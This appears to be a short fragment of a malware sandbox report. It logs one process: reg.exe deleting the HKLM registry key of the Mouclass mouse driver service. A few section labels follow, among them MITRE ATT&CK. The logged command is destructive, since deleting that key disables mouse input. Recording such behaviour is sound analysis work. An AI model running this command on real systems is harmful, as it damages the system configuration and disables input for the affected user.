-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"3⤵PID:2776
Network
MITRE ATT&CK Enterprise v15
Downloads